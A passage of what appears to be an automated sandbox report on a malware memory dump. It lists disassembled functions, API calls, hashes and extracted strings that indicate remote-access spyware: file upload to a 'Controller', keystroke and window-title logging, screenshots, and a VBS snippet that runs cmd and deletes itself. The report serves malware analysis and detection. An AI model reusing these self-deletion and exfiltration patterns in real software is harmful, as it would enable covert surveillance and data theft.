                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-1941338355
                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                    Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                    • Opcode Fuzzy Hash: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                    Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                    • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                    Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                    Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                    • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                    Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                    • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                    Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                    • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                    Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-3229884001
                                    • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                    • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                    Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                    Function 0041C6F3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                    • API String ID: 1332880857-3730529168
                                    • Opcode ID: 9acb91869caa52ba962ff5e9cffe7dbf008cca4ae8889db815e50d5881a9b18e
                                    • Instruction ID: 30dd124696def6d144da0f01c12024620090e461f41beb3abd2b2340f2562d2c
                                    • Opcode Fuzzy Hash: 9acb91869caa52ba962ff5e9cffe7dbf008cca4ae8889db815e50d5881a9b18e
                                    • Instruction Fuzzy Hash: E961F3711082419AD325EF11D851EEFB3E8BF94309F10493FB589921A2FF789E49CA5A
                                    Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    • API String ID: 489098229-1431523004
                                    • Opcode ID: 0a3c78d02fe8e2a34889c0781f83a9f873681b02ef9484db30951b5d4f55da13
                                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                    • Opcode Fuzzy Hash: 0a3c78d02fe8e2a34889c0781f83a9f873681b02ef9484db30951b5d4f55da13
                                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                    Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                    • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                    Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                    Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                    Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: $C$PkGNG
                                    • API String ID: 3864826663-3740547665
                                    • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                    • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                    Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
                                    • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                    • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                    Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                    Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425
                                    • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                    • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                    Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
